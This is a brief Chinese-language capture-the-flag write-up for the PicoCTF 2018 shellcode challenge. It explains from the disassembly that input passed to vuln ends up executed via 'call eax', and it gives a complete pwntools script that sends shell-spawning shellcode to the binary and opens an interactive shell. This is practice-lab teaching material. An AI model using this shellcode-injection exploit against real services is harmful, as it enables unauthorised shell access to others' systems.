ida主函数不能反编译,直接看汇编image.png
    image.png
    可以看到vuln是有参数,所以ebp+var_A0是传了个参数
    注意下面的call eax ,所以我们只要往vuln里输入shellcode最后就能get shell

    1. from pwn import *
    2. from struct import pack
    3. context.log_level = 'debug'
    4. io =process('./PicoCTF_2018_shellcode')
    5. #io =remote('node4.buuoj.cn',29298)
    6. shellcode =asm(shellcraft.sh())
    7. io.sendline(shellcode)
    8. io.interactive()